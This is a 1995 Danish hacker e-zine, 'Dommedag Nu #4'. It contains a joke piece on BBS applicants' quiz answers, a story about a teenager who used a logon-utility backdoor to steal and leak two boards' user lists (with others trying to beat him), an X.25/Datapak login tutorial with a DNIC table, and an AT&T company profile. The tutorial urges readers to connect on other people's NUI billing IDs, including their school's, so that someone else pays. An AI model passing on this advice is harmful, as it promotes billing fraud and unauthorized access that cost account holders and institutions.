SuperHack

home *** CD-ROM | disk | FTP | other *** search

/ SuperHack / SuperHack CD.bin / Hack / MISC / DDN-4.ZIP / DDN4.TXT next >

Wrap

Text File | 1995-10-04 | 89.4 KB | 2,105 lines

301603 Z SEP 1995 STARTEX Dommedag Nu #4 - SMERSH - DUMMESLAG TIL Deja-vu....... Vores 3Lit3 SYSGUD på PLAN B har gjort det igen. Da han, som den f¢rste, fik lagt sine klamme hænder på en kopi af DDN#3 spredte han den som d¢d og helvede, hvilket er helt fint, det var faktisk meningen, men der er bare et lille pro- blem. Problemet består i hans BBS add, som i dette tilfælde hed BEERS.EXE. Problemet med BEERS.EXE var, at den var inficeret med QuickSilver virus'en, og den blev så spredt over det ganske land. Dette var godt nok ikke med vilje, men stadigvæk: DUMMESLAG TIL Deja-Vu..... [Dommen udf¢rt den 11/9 1995 -red]. Men nu til noget helt andet. Velkommen til Dommedag Nu #4. Jeg/vi håber, at i syntes om det, og spreder det som gale. Som sædvanligt vil vi gerne have noget "feedback" på magasinet, og vi kan kontaktes på PLAN B, eller på vores 3 Dist. sites (se nedenunder). Vi har lagt mærke til, at folk fors¢ger at komme i kon- takt med os de mærkeligeste steder. Vi ringer ikke meget rundt, så her kan du få fat på f¢lgende: Saron - Rundt omkring, men ringer med meget forskellige intervaller. Clive Sharp - Hænger ud på PLAN B, Darkside Connection og ingen andre steder!!! Deja-Vu - Rundt omkring, også på de fleste st¢rre WaR3z boards... Narkobagmanden & 99papa er phreakere (og 3LiTe trashere (hmmm)) som ikke ringer rundt, men de kan, hvis i vil snakke med dem, kontaktes gennem Saron, Clive Sharp & Deja-Vu. Vi mangler, som sædvanligt, noget materiale som vi kan smide i bladet, så hvis du har noget du mener der er interesseant, smid det op til os. ALT har inter- esse, men vi kan ikke garantere at det kommer med i bladet. Jo mere teknisk det er, jo bedre, men det er bestemt ikke noget krav, så hvis du har en capture fra dit sidste hack, eller noget andet i den genre, upload det til os (men s¢rg for at det ikke er FOR "belastende"). Nok fra mig, mu skal du bare nyde bladet.... - Clive Sharp Medvirkende: De 7 på toppen: Redakt¢r............... Pat Bateman Eksklusiv skribent..... Saron KTAS hævneren.......... Clive Sharp Lærlingen.............. Narkobagmanden Helten................. 99papa Den onde............... Darkseed Logistik: SYSGUD................. Deja-vu PLAN B................. 31220506 UAFD: Darkside Connection.... 45974344 Alien Staircase........ 31575188 Restricted Access...... 36703060 Og det l¢se: Tak til................ Darkman , TorNado & Solaris Farve af............... QEdit Advanced V3.00c SW Tryk af................ Cannon LBP-4 Lagerplads............. Western Digital Outside Broadcasting... Zitech 486/66 bærbar Motorola Lyd.................... GravisUltraSound MAX Musik.................. Frontline Assembly Vi anbefaler........... BOMBJACK Indholdsfortegnelse: 1. Livet på PLAN-B. 2. Saga'en om Junker Jake. 3. X.25 for begyndere. 4. AT&T - En global organisation. 5. En Polymorphic Virus. 6. Hvad vil fremtiden bringe for Dommedag Nu? 7. CyberBug v. 1.00 Nyheder (taget, stort set, fra den Danske dagspresse). Hackere Bustet! Hackere anholdt. [Fra Ekstra-Bladet (suk!).] Råd til Danske sysopper og brugerne af deres systemer. Dansk Piratlinie oprettet. [Jyllands-Posten.] Svære tider for hackere. [ComputerWorld.] Hackere ringer verden rundt på andres Visa Dankort. [ComputerWorld.] Se hackerens telefonnummer. [ComputerWorld.] Sikkerhedshul i Netscape. [ComputerWorld]. ■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■ Livet på PLAN-B (Uden synd ingen frelse) Af Clive Sharp & Deja-vu 1. Indledning Efter vi bragte nummeret til PLAN-B i Dommedag Nu nr. 3, har vi fået en masse henvendelser. Mange af dem er fra folk der ved hvad de snakker om, men desværre er der også en masse folk, som INTET ved om hacking. Dette er jo ikke nogen synd, da vi alle skal starte fra et sted. Problemet er, at der er FOR mange, der slet ikke har noget grundlag for at begynde at hacke. Det mest ide- elle ville være, at vi lod alle komme ind på boardet, men det ville give os (især Deja-Vu) en uoverskuelig arbejdsopgave. Så for at skille de vidende fra de "uvidende" har vi installeret nogle "sp¢rgeskemaer" når man s¢ger om optag- else som ny bruger. Disse "sp¢rgeskemaer" har været grundlag for mange timers sjov, og nu vil vi dele disse sjove oplevelser med alle jer. Bemærk venligst, at alle disse svar er givet i FULDT ALVOR, hvilket g¢r det ret sjovt. Alle navne er blevet slettet, da vi ikke ¢nsker at hænge nogen ud. Alt i [] er vores kommentarer. Nå, men lad os komme i gang. 2. PLAN B registering - Hacking Hvor ligger de priviligerede porte på TCP/IP: ■ Til venstre!?! [HVAD?!? Har du r¢get???] Hvad er Telnet port 25 og 79: ■ X.25 og X.79 [Næppe.] ■ Tele port 25 of 79. [Hvad ????] Hvad er X.25: ■ Telenet standart. [Nope.] ■ Netwærk. [Tæt på, men ikke helt korrekt....] ■ NUA connection (datapak). [hmmmmm...] Hvad er .RHOSTS: ■ Telenet standart. [Nej......] Hvad er en PAD: ■ Et tastatur. [Man tror det er l¢gn.] ■ Password active destroyer. [Hvad er det?????] Hvad er COPS: ■ Fedz. [Hvor dum kan man være...] ■ Bad ones. [Ditto.] ■ Politi betjent. [Ditto.] ■ Politi??? [Ditto.] ■ Politi. [Ditto.] ■ En sysop. [Ok, måske er der en sysop der hedder COPS, men tror du det er ham der bliver spurgt efter???] ■ Et program på TV VestKysten [!!!!!] Hvad er SATAN: ■ Div evil. [?!?!?!?] Hvad er ideen bag en FIREWALL: ■ To protect system. [Det skal nok uddybes lidt..] ■ Man kan komme ind igen. [Så starter vi forfra igen.] ■ At beskytte sig. [Godt gættet.] Hvad er en NUI: [Dette svarer de fleste rigtigt på.] Hvad er RSH: [Dette svare de færreste på.] Hvad er Crackerjack: ■ Et program. [Fedt....] ■ Hacker program. [Uddybes tak....] ■ Online password cracker. [Ikke helt....] Hvad er CERT: ■ Hacker group. [Super lamerzz....] ■ En hacker gruppe. [Ditto.] ■ Hacker gruppe. [Ditto] Hvem er CERT's Danske medlem: [Kun 1 har svaret på dette.] Hvad er/var QSD: ■ D¢dt. [hmmmmm.] ■ Et board. [Ikke helt rigtigt.] Hvordan bruge man ICMP beskeder til egen fordel: ■ Well, send and recieve. [Hvad?!?!?] ■ Læse dem. [Hvad ?!?!?!?] Hvordan virker en ETHERNET SNIFFER: ■ Cops. [!?!?!?!] ■ Samler password. [Og hvad mere.....] Hvad er nemt hvis TFTP er sat dårligt op: ■ Hack. [Godt tænkt..., men måske lidt mere præcist.] ■ At hacke sig ind. [Ditto.] ■ Hacke sig ind. [Ditto.] ■ At hacke shit'et. [Ditto.] ■ Hente filer der ikke er tilgængelige. [Ditto.] Hvad er en GOD/OD: ■ Ahmm Think it is a Sysop. [Det er næppe det der bliver tænkt på i et hacking "sp¢rgeskema", vel???]. ■ Sysop. [Ditto]. 3. PLAN B registrering - Phreaking Hvilke Numrer BlueBoxer man altid over: [Ganske få svarer på dette.] Hvad er teorien bag BlueBoxing: ■ At ringe gratis. [Måske lidt mere specifikt.] ■ At skabe frit lejde gennem nettet. [Frit lejde???] ■ At udsende en tone der forvirer systemet. [Nej..] ■ No pay (for da phreaker). [Godt tænkt..] ■ Hmm bb er det ikke det med lyd Hz. [Det er det nemlig..] ■ Ja man bruger en frekvens til at snyde tlf. [Nej nu bliver det for teknisk...] ■ erhm PBX??? [Båtnakke]. Hvad er CCCIT 5: ■ Nogle seje gutter. [Tror han, at det er en gruppe?????] ■ Calling card. [Nej....] ■ Modem standart. [Hmmm, nope..] Hvad er en PBX: ■ Dialout site. [Hmmm.] ■ Power box. [Hvad er det???] ■ Et sted som du ringer videre fra. [uhhh....] Hvad er "Alliance conf.": ■ Phreaking. [Ikke just.] ■ A friendly one. [Hvad?!?!?!] 4. PLAN B registrering - Virus Hvad er VCL: ■ Virus Clean. [Næppe.] ■ Program. [Godt gættet.] ■ Virtuelt Clear Lockout. [Hvad?!?!?!] Hvor'n virker en Polymorphic virus: ■ ¥delæggende. [NNEEEJJJJ.] ■ Formaterer din HD. [Ditto.] Hvem er Dark Avenger: ■ Frygtet. [Fedt...] ■ Hvis med i PWA... [Super Lamer!!] ■ Virus program. [Nej, nej, nej.] ■ En skummel fyr. [Fedt, og hvad mere???] ■ En Virus. [Nej.] Hvad er 40HEX: ■ Ahmm.. Hex er hexa decimaler. [Det er næppe det der bliver spurgt om i et Virus area, vel??] ■ Langues. [?!?!?!?] ■ Program-tal. [Fedt!!] ■ Som related stuff.. [Godt gættet.] ■ En virus. [Nej.] ■ The magic number of kilobytes a com file kan be. [Det er næppe det der bliver spurgt efter.] 5. "Brevet" Man skal nu ikke tro, at "sp¢rgeskemaerne" er det eneste vi bruger til at vurderer en ny bruger, for det er det ikke. Vi har brugere, der ikke har svaret på et eneste sp¢rgsmål, og grunden hertil er, at hvis man har den rette indstilling, så kan man sagtens komme ind, selvom at man ikke har den helt store viden om hacking. Herefter f¢lger nogle af de breve vi har modtaget, fra nye brugere. Fælles for alle disse breve er: 1. Ingen af dem havde udfyldt et rimeligt antal sp¢rgsmål (eller bare et!), og 2. ganske få kom ind på boardet (i så tilfælde er de medtaget her, pga. deres mere eller mindre morsomme breve). 6. Hvad De skrev ■ Well I'll leave this shit up to you. ■ jeg håber at vi kan udveksle mange gode crack's og warez programmer. jeg har bland andete qmodem pro 2.0 for win95, norton navigator for win95, windowscommander v1.61 *cracked* m.m. please upgrade me! [Er du sikker på, at du har ringet det rigtige sted hen??? Det er vi IKKE!] ■ you need me!!!! ■ Ahm... Jeg er Faktsik Kun Elite... Ikke rigtig noget inden for Virus eller hacking eller Phreak... SO... Håber jeg kommer ind... [3LiTe den her!!!] ■ Ahm... I HATE VIUS :) [I hate jou :) ] Na... Jeg er kun en lille pirat Hacker ikke phreaker... OG coder heller ikke virussersss SEEEEES [yeps.. netop] ■ HVORFOR?????????????????????? Hvorfor er jeg ikke kommet ind igen??????? Jeg var på DL-top10'en!!!!!!!! [!!!] Jeg skrev meget!!!!!!!!!!!!!!! [Kvalitet frem for kvantitet!] Hvad nu??? Hvad vil du ha'??????? PLEASE LET ME IN!!!!!!!!!!!!!!!! ■ Hi.. Tjjaa.. jeg jan sikkert svarre på nogle af de sp¢rsmål. men det er ville sikkert ikke være rigtigt alligevel... Det eneste jeg er interseret i er at Trade og Warez... så jeg tænkte at dette BBS ville være som skabt for mig for at få nye MCI med mere.. Cya Later... [Vi HaR De$\/æRr3 ikk3 MCi'$ pÅ B0aRd3t] ■ jeg ¢nsker bare access til hacking program [Maj mange hacking program har, dig ingen adgang!!] ■ SOM DU KAN SE ER JEG NEW USER OG OENSKER AXX PAA BOARDET. DA DU HAR LAEST MIN REGISTRERING KAN DU SE AT JEG IKKE VED MEGET OM H/P/A I DET HELE TAGET MEN DET ER NETOP OGSAA GRUNDEN TIL AT JEG OENSKER AXX, FOR AT LAERE OM DET SAA JEG KAN BLIVE BEDRE. DERFOR HAABER JEG AT DU VIL GRANETE AXX TIL MIG. [Slå lamer tasten fra!] ■ Well, I stink can't help it, det er anden gang jeg har fyldt ud, saa denne bliver vel ligesaa daarlig som den foerste - aergeligt.. Well, Glad to stop by anyway. [Tredie gang er lykkens gang!] ■ Hej Med dig. Hvad fanden er det for nogle åndsvage sp¢rgsmål? Jeg troede jeg havde fundet en varm hacker bbs og så havner jeg i lykkehjulet har jeg vundet noget? ■ hi deja-vu im sure i've seen you before he he im not no elite and im sure not an enclypidia im afraid i could not answer any of your ? maybe the 40hex if i calculatet i little bit but i dont think that it would matter much anyway im sure XXXXXXXX [Slettet -red] will say ok for me im uuping and downing some warez sometimes well thats about it i guess. [Når man pr¢ver at omregne 40h til decimal (og så på det eneste sp¢rgsmål man besvarer), og ikke engang kan det, SÅ ER MAN PRESSET I BUND!!] ■ Hi there.. Kunne jeg komme ind her... or.. ? ■ hejsa jeg håber at jeg får access, da jeg er MEGET interassede i at få nogle nye spil & progs..... [Nej men du kan ringe til DanBBS og sp¢rg om du ikke kan blive opgraderet til Elite Pirat Bruger!] ■ Give me access_! [Sut mig!] 7. Et sidste ord Nogle vil måske syntes, at vi er temmeligt arrogante, og at vi ikke kan tillade os, at hænge folk på denne måde. Til det vil svaret være: Når man har ca. 1-2 nye brugere om dagen, så bliver man temmeligt træt af, at se på folk som ikke kan/gider at udfylde vores "sp¢rgeskemaer", og når der nu engang imel- lem kommer en rigtig WaR3z gut forbi, så må man sku' da kunne lave lidt sjovt med dem, det er jo ikke kun fuldt alvor. Under alle omstændigheder, så håber vi, at denne artikel har været lige så sjov at læse, som den var at lave. ■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■ Saga'en Om Junker Jake ------------------------ - Darkseed Alt er blevet sagt, og alt bliver sagt, men hvad var grunden til at en dreng på 14 år kom ind, og hvad kom og kommer det til at betyde. En lille ubetydelig "jeg er intet" fyr, havde tilfældigvis på ukendt måde, fundet ud af, at der var en backdoor i Vigilantes S-Logon Utility til PCboard der gav mere eller mindre access til at kunne fx. hente et boards Userliste, så han gav sig UDEN at tænke, igang med 2 boards (Dyers Eve samt Travelogue) som han så fik deres Userlister ud af, lidt tid gik så, hvor Junker Jake så misbrugte nogle forskellige accounts, downloadede osv. Nu gik det f¢rst galt, Junker Jake releasede nu de 2 Userlister over mange Elite boards, der derefter fik trædem¢llen til at træde rundt, medf¢lgene i arkivet var f¢lgene tekst fra Junker Jake.: Yo!, Her er en besked til alle i denne skide lamme "scene" kaldet dk : %\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\ Efter at have blevet taget i farten med at have det sjovt, har jeg besluttet mig at stoppe i scenen nu. Den rigtige historie er nok at jeg hackede nogle Boards, folk blev sure, selv om jeg ikke gjorde nogen skade. Udover at misbruge deres accounts for at downloade. Så det var det, jeg stopper! Det var meget sjovt og jeg putter det hele bag mig nu, og får et liv uden Teledanmarks telefonregning. Jeg vil bare sige tak til alle de mennesker jeg har chattet mig, tradet osv. Og jeg er specielt ked af at misbruge Bionics account, men det var meget sjovt på Velvet Underground :) tja jeg er ked af det, men det er jo hvad der sker. Men ok alt hvad jeg fik ud af det var nogle chips, lidt Cola, nogle Userlists osv. Jeg er totalt ligeglad, med de Userlists, så her er de :) jeg råder alle der er listet i disse Lister, at ændre deres Passwords, Tlf.nummere osv. %\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\%\ Ses, Junker Jake / =[>ALPHA FLiGHT<]= En ting som Junker Jake skrive, som jeg bed mærke i f¢rst, var sætningen > Men det er jo hvad der sker. Jeg vil efter sk¢n sige at dette ikke er hvad der sker, da selve "scenen" ikke er interesseret i at skade sig selv. Det har hidtid ikke været et problem, men en stadig stigene mængde af "unge" folk ses stadig at komme ind i scenen - Disse mennesker eller b¢rn, har ingen efaring, og kender ikke de (U)-skrevne love i scenen, ganske simpelt fordi de ikke har været længe nok i scenen til at kunne lære det - Men stadig er det ingen undskyldning, overhovedet ikke, for de burde ikke være her, medmindre de er helt indforstået med hvad den såkaldte "scene" er for noget...... Men tilbage til emnet. Efter filerne var blevet spredet godt rundt, begynder det f¢rst at se sort ud for Junker Jake, alle flamede ham (og g¢r det stadig), nogle folk har været ude på hans private adresse for at lære ham ordet "VOLD", dette mislykkes da han ikke var hjemme, men en seddel var blevet lagt til ham, og Junker Jake skyndte sig så at ringe til en af dem, hvorefter han fik en telefon-svarer, det sagde Junker Jake så at han havde h¢rt at nogle havde været ude hos ham for at banke ham, og han var ked af det, samt at han havde smidt Userlisterne væk igen.. [Denne sampel ligger også i Zip filen, samt en player -red]. Dette hjalp dog ikke, en anden person ringede til Junker Jake for at tale med ham, hvorefter han br¢d sammen og græd - efter ca. 1000 tårer tilb¢d han så at betale for en ny oprettelse af en linie, samt nogle andre ting. ----- Indtil dette har det været temmelig umuligt, for PHG (Politiets Hacker Gruppe) at ramme scenen, men efter Pharzyde Bust, begynder de sorte tider at kikke frem, politiet har, som skrevet i en anden artikel, alle stederne hvor Pharzyde har ringet hen - Og af en af mine pålidlige kilder har jeg fået at vide at "Travelogue" allerede er lukket. Jeg vil ligeså råde folk der er i "scenen" at de passer lidt på med hvad de g¢r i det næste stykke tid, da "scenen" ikke er så sikker som den har været. Vi skal selvf¢lgelig huske at takke Junker Jake for at der nok kommer mange Busts i denne tid.... ■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■ X.25 for begyndere Af Clive Sharp 1. Hvad er X.25 X.25 er i Danmark også kendt som Datapak, og er en internationalt netværk, som var et af de st¢rste netværk inden Internettet blev trendy. Det er forbundet med mange andre mere eller mindre bizarre netværk i rigtigt mange lande, og som eksempler kan nævnes SprintNet, TymNet o.s.v. Der findes GateWays på X.25, dvs. at man kan f.eks. komme på Internettet ved at k¢re gennem X.25. Man kan selvf¢lgeligt også bare hacke en maskine på X.25, der har forbindelse til Internettet, og så k¢re gennem der. Men den bedste ting ved X.25 er: DET ER GRATIS AT RINGE TIL!!!!! 2. Historien bag X.25 (MEGET KORT) Den teknologi der bruges på X.25 idag stammer, i bund og grund, fra 1968, hvor ARPANET kom op at k¢re. Ideén bag X.25 er Packet Switching, som er bygget op på denne måde (MEGET forenklet): ■ Al data bliver sendt i pakker, som er opbygget på denne måde: ■ Pakken har én bestemt længde. ■ Pakken har adressen på modtageren (logisk nok). ■ Pakken har et nummer, så man kan bestemme rækkef¢lgen hos modtageren (de ville nok ikke være så smart, hvis pakkerne kom på denne måde: 1,3,2,4,6,9,111,10 o.s.v, det er selvf¢lgeligt et krav, at pakkerne kommer som: 1,2,3,4,5,6,7,8,9,10 o.s.v.). Stedet hvor al data'en bliver delt op i pakker (og sat sammen i pakker) er en PAD. PAD betyder Packet Assembler/Disassembler, og det er den man logger ind på i vores tilfælde. 3. Hvordan logger man på For at logge på skal du g¢re f¢lgende: ■ Ring 171 (Det er gratis!!) ■ Når du har fået en connect, så sker der ikke noget... Du skal nu trykke : go (uden return). ■ På skærmen står der nu: DATAPAK X.28 SERVICE PAD-ID : HIPC_ PORT-NO : 28 ENTER NUI -> Her begynder det at blive spændende. De f¢rste 3 linier har ikke den store interesse i vores tilfælde (grunden til at der står X.28 er, at X.28 er den protokol som bruges mellem terminalen og PAD'en, mens X.25 er den protokol som bruges til kommunikation "internt" på nettet) men den sidste linie er enormt interesseant. Da jeg sagde, at det var gratis at bruge X.25 l¢j jeg lidt. Det er gratis at ringe op, men så skal man opgive et nummer, hvor ens forbrug skal krediteres. Dvs. at den person/firma hvis nummer man bruger får regningen (temmeligt fikst, ikke sandt ?!). Et sådanne nummer hedder en NUI, Network User Id, og er opbygget på denne måde: ■ XYYYYYYYZZZZZZZZ X= Et bogstav, bestemt af TeleDanmark. Y= Nogle tal, bestemt af TeleDanmark. Z= Tal eller bogstaver, bestemt af kunden. Hvis du så har indtastet en gyldig NUI i linie 4 (se ovenover), frem- kommer en [*], og så er du parat til at gå amok på nettet. Men lad nu være med at sidde og pr¢ve at "gætte" en NUI, for det VIL blive opdaget af TeleDanmark. Istedet så check din skoles computer (forudsat at du går i skole), for der er temmelig stor sandsynlighed for, at skolen har Datapak adgang, og så kan du jo bare lade skolen betale dine "udflugter" :). 4. Simple funktioner Men f¢r du kan begynde dit super-vilde-hacker-gå-amok-trip på nettet, så skal du lige vide lidt mere om hvordan det virker. Det f¢rste du skal vide noget om, er en(et??) NUA. NUA betyder Network User Address, og er bygget op på denne måde: ■ 023421920100401 ││ ││ ││ │ │└┬─┘└─┬─┘└─┬─┘ │ │ │ │ │ │ │ └────────── Netværk adresse (variabel længde, men │ │ │ standarten er 5 eller 3). │ │ └─────────────── Område præfix (længden ligger, såvidt │ │ jeg ved, fast på 5). │ └──────────────────── DNIC (Data Network Identification Code) │ Længden ligger fast på 4. DNIC bruges │ til at identificere hvilket netwærk man │ er på, og hvilket land det ligger i. │ Se punkt 6. └────────────────────── 0 bruges hvis man ringer til en NUA der ligger i samme land, som den PAD man bruger, hvis man ringer udenlands, skal man bruge 9 istedet. Der findes en masse dejlige funktioner på Datapak, men her vil jeg nu kun gennemgå en, nemlig CON. CON bruges til at få forbindelse til en anden com- puter på nettet (CONnect). Dvs. at hvis jeg vil i forbindelse med en computer med NUA'en 23421920100401, så skal jeg skrive: ■ *con 923421920100401 ││ │ ││ │ │└┬┘ │└─────┬──────┘ │ │ │ │ │ │ │ └────────── Vores NUA. │ │ └───────────────── 9 fordi vi ringer udenlands. │ └──────────────────── Vores CONnect kommando. └────────────────────── Datapac er parat. Så vil Datapac svare med at gentage linien (uden *), og efter et par sekunder skulle man kunne se: Login (eller hvad man nu har fået fat i). Det skal dog lige nævnes, at man ikke beh¢ver at skrive con, da dette vil udf¢re præcis samme job: *923421920100401. Overstående NUA er forresten noget der hedder CAMPUS 2000, og det er et slags chat system for skoler o.s.v. Personligt syntes jeg, at det er noget ækelt skod, men sådan er der så meget.... 5. Menu'en Men Datapak har også en menu, som man kan lege rundt med. For at komme "ind" i menuen skal man bare skrive (når "*" er der): menu. Så kommer man ind i PAXNET PUBLIC PAD COMMAND MENU. Jeg vil ikke gennemgå menuen, da den er temme- ligt selvforklarende, dog skal der lyde en lille advarsel fra mig: Pas på med at rode ved ting du ikke kender noget til! Der er muligheder nok til at du kan brænde dine fingre, med det resultat, at din NUI lider en brat d¢d.... Men hvis du absolut vil rode med den slags ting, så pr¢v at tast "?" (når "*" er der), så får du nogle settings du kan lege med. Personligt kan jeg ikke bruge dem til noget, men måske kan du. 6. Hvilket land/netwærk er det? F¢lgende liste er stjålet fra The Dark Council's tekst om DataPAC (brugt i: The Canadian Hacker's Bibel). Listen er rimeligt gammel (omkring 1990) så den er IKKE komplet, men jeg har ikke set nogle nyere update's, så det er hvad i får. ■ Land Netværk's Navn DNIC ──────────────────────────────────── Andora ANDORPAC 2945 Antigua AGANET 3443 Argentina ARPAC 7220 ARPAC 7222 ¥strig DATEX-P 2322 DATEX-P TTX 2323 RA 2329 Australien AUSTPAC 5052 OTC DATA ACCESS 5053 AUSTPAC 5054 Bahamas BATELCO 3640 Bahrain BAHNET 4263 Barbados IDAS 3423 Belgien DCS 2062 DCS 2068 DCS 2069 Bermuda BERMUDANET 3503 Brasilien INTERDATA 7240 RENPAC 7241 RENPAC 7248 RENPAC 7249 Cameroon CAMPAC 6242 Cayman ¢erne IDAS 3463 Chad CHAD 6222 Chile ENTEL 7302 CHILE-PAC 7303 VTRNET 7305 ENTEL 7300 Kina PTELCOM 4600 Colombia COLDAPAQ 7322 Costa Rica RACSAPAC 7120 RACSAPAC 7122 RACSAPAC 7128 RACSAPAC 7129 Cypern CYTAPAC 2802 CYTAPAC 2807 CYTAPAC 2808 CYTAPAC 2809 Danmark DATAPAK 2382 DATAPAK 2383 Djibouti STIPAC 6382 Dom. rep. UDTS-I 3701 Egypten ARENTO 6020 Finland DATAPAK 2441 DATAPAK 2442 DIGIPAK 2443 Frankrig TRANSPAC 2080 NTI 2081 TRANSPAC 2089 TRANSPAC 9330 TRANSPAC 9331 TRANSPAC 9332 TRANSPAC 9333 TRANSPAC 9334 TRANSPAC 9335 TRANSPAC 9336 TRANSPAC 9337 TRANSPAC 9338 TRANSPAC 9339 Fr. Antiller TRANSPAC 2080 Fr. guiana TRANSPAC 2080 Fr. Polynesien TOMPAC 5470 Gabon GABONPAC 6282 Tyskland DATEX-P 2624 DATEX-C 2627 Grækenland HELPAK 2022 HELLASPAC 2023 Gr¢nland KANUPAX 2901 Guam LSDS-RCA 5350 PACNET 5351 Guetamala GUATEL 7040 GUATEL 7043 Hondura HONDUTEL 7080 HONDUTEL 7082 HONDUTEL 7089 Hong Kong INTELPAK 4542 DATAPAK 4545 INET HK 4546 Ungarn DATEX-P 2160 DATEX-P 2161 Island ICEPAK 2740 Indien GPSS 4042 Indonesien SKDP 5101 Ireland EIRPAC 2721 EIRPAC 2724 Israel ISRANET 4251 Italien DARDO 2222 ITAPAC 2227 Elfenbens kyst. SYTRANPAC 6122 Jamaica JAMINTEL 3380 Japan GLOBALNET 4400 DDX 4401 NIS-NET 4406 VENUS-P 4408 VENUS-P 9955 VENUS-C 4409 Korea Rep. DACOM-NET 4501 DNS 4503 Kuwait BAHNET 4263 Libanon SODETEL 4155 Luxenbourg LUXPAC 2704 LUXPAC 2709 Macau MACAUPAC 4550 Maylasia MAYPAC 5021 Mauritius MAURIDATA 6170 Mexico TELEPAC 3340 Morokko MOROCCO 6040 Holland DATANET-1 2040 DATANET-1 2041 DABAS 2044 DATANET-1 2049 N. Mariana PACNET 5351 New Caledonia TOMPAC 5460 New Zealand PACNET 5301 Niger NIGERPAC 6142 Norge DATAPAC TTX 2421 DATAPAK 2422 DATAPAC 2423 Panama INTELPAQ 7141 INTELPAQ 7142 Peru DICOTEL 7160 Philipinerne CAPWIRE 5150 CAPWIRE 5151 PGC 5152 GMCR 5154 ETPI 5156 Portugal TELEPAC 2680 SABD 2682 Puerto Rico UDTS 3300 UDTS 3301 Qatar DOHPAC 4271 Reunion (Fr.) TRANSPAC 2080 Rwanda RWANDA 6352 San Marino X-NET 2922 Saudi Arabien ALWASEED 4201 Senegal SENPAC 6081 Singapore TELEPAC 5252 TELEPAC 5258 Syd Afrika SAPONET 6550 SAPONET 6551 SAPONET 6559 Spanien TIDA 2141 IBERPAC 2145 Sverige DATAPAK TTX 2401 DATAPAK-1 2402 DATAPAK-2 2403 Schweitz TELEPAC 2284 TELEPAC 2289 Taiwan PACNET 4872 PACNET 4873 UDAS 4877 Thailand THAIPAC 5200 IDAR 5201 Togolese Rep. TOGOPAC 6152 Tortola IDAS 3483 Trinidad DATANETT 3745 TEXTET 3740 Tunesien RED25 6050 Tyrkiet TURPAC 2862 TURPAC 2863 IDAS 3763 Foren. arabiske.EMDAN 4241 EMDAN 4243 TEDAS 4310 Uruguay URUPAC 7482 URUPAC 7489 Rusland IASNET 2502 Jomfru ¥erne UDTS 3320 England IPSS-BTI 2341 PSS-BT 2342 MERCURY 2350 MERCURY 2351 HULL 2352 Jugoslavien YUGOPAC 2201 (NÆPPE OPPE!!!) Zimbabwe ZIMNET 6482 7. Konklusion Jeg håber, at denne artikel har hjulpet dem af jer, som ikke vidste hvad Datapak var. Alle dem der har været på Datapak f¢r har sikkert ikke fået noget ud af denne tekst, men det var nu heller ikke meningen. Hvis i finder nogle fejl (dem er der sikkert et par stykker af), så læg post til mig på PLAN B, hvilket (stort set) er det eneste sted jeg "kommer" ( ── hmmmm)....... ■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■ AT&T - EN GLOBAL ORGANISATION ------------------------------- - Darkseed AT&T betyder for mange kommunikation, og i stort omfang er dette også rigtigt, men hvad er en eventuel konsekvens af en verdensomspændt koncern, der med tiden bliver st¢rre og st¢rre - Hvilken effekt kan det få vis kun en koncern får tilstrækkelig magt, til at styre hele jordens kommunikations-net. Som så mange har lagt mærke til, gælder f¢lgene regel : 'DEN DER KONTROLLERE KOMMUNIKATIONEN KONTROLLERE VERDEN'.. AT&T's f¢rste bygning ligger tilbage til 1882, hvor de åbnede en afdeling i Antwerp, Belgien, hvorefter de brugte de næste 40 år med at åbne afdelinger og lægge telefon-linier ud i Europa, Asien samt Afrika. Allerede dengang blev det besluttet at de ikke skulle have for meget magt, så i 1925 solgte de deres fremstilling af telefoner til andre lande (ITT-System), Hvor AT&T så rettere deres interesse for den Universale telefon service i USA, men forsatte dog stadig deres lang-distance service, til andre lande, hvorefter de i 70'eren fornyede deres internationale aktiviteter - i 1980, annonceret AT&T så igen at de ville gå igang igen med styring af den globale verdens kommunikation. Tilbage i 1991 fik AT&T 24% af deres inkomst fra det internationale marked, hvilket de dengang spåede til at i år 2000, ville det være oppe på 50 %. AT&T har også gjort store fremskridt indenfor teleudstyr - AT&T har via deres AT&T Microelektronik produceret over 40 forskellige AT&T produkter designet for brugerens benyttelse, såsom trådl¢se samt ledning-telefoner, samt telefon- svarer, der bliver exporteret til hele 24 lande, samt EDB-l¢sninger til såvel små som st¢rre virksomheder, som ligger både i alm. systemmet samt PBX- systemmer der er blevet solgt til over 45 lande. AT&T har 50 distribut¢rer over hele jorden, hvor AT&T Microelektronik har et netværk med 15 salgs- og teknisk marketing kontorer. AT&T EasyLink er også blevet sat i kraft med elektronisk beskeder der rykker rundt i hele verden, samt med Telex-systemmer, sat op over hele kloden, for absolut kommunikation. AT&T INFORMATIONER - i 1991 havde AT&T over 50,000 ansat udenfor deres kontor i USA.. ■ AT&T er aktive i omkring 100 lande rundt om jorden, og laver forretninger i 120. ■ AT&T har 34 fabriker udenfor USA -Hvilket er 16 i Europa, 12 i Asien, 5 i Latin Amerika og 1 i Canada. ■ AT&T har 1 fabrik i Sinapore vor 3,270 personer er ansat, her bliver der produceret AT&T's trådl¢se telefoner, samt produktionen af Sikkereds-systemmer. -En fabrik i Bangkok, Thailand ar 850 personer der arbejder på at lave telefoner samt telefon-svarer systemmer -En fabrik i Guadalajara, Mexico som procedure telefonsvarer- systemmer. -AT&T Microelektronik laver produkter i både Thailand, Spanien, Mexico, Singapore og England. ■ AT&T Kapital Corp., har $6 billioner kroner i pungen, med finansering af både AT&T og ikke-AT&T produkter samt servicer i Canada og Europe. AT&T har gennem tiden lavet kontrakter med disse lande, om at levere telefon- linier over hele landet: BELGIUM BULGARIA CZECHOSLOVAKIA FRANCE GERMANY GREAT BRITAIN ITALY THE NETHERLANDS POLAND SPAIN SWITZERLAND ASIA BRUNEI HONG KONG INDIA INDONESIA JAPAN CHINA PHILIPPINES SINGAPORE SOUTH KOREA SRI LANKA TAIWAN THAILAND THE CARIBBEAN CENTRAL AMERICA MEXICO SOUTH AMERICA BRAZIL CHILE VENEZUELA CANADA MIDDLE EAST EGYPT KUWAIT SAUDI ARABIA 